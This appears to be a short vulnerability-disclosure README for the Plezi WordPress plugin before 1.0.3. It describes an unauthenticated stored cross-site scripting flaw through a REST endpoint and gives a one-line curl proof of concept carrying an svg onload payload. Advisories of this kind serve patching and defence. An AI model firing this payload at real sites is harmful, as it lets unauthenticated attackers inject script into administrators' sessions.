.. | |||
README.md | Loading last commit info... |
README.md
Plezi < 1.0.3 - Unauthenticated Stored XSS
Description
The plugin has a REST endpoint allowing unauthenticated users to update the plz_configuration_tracker_enable option, which is then displayed in the admin panel without sanitisation and escaping, leading to a Stored Cross-Site Scripting issue
Proof of Concept
curl -X POST 'https://example.com/wp-json/plz/v2/configuration/update-tracker?switchstatus="><svg/onload=alert(`XSS`)>'
References
https://wpscan.com/vulnerability/7cede02e-9af7-4f50-95a8-84ef4c7f7ded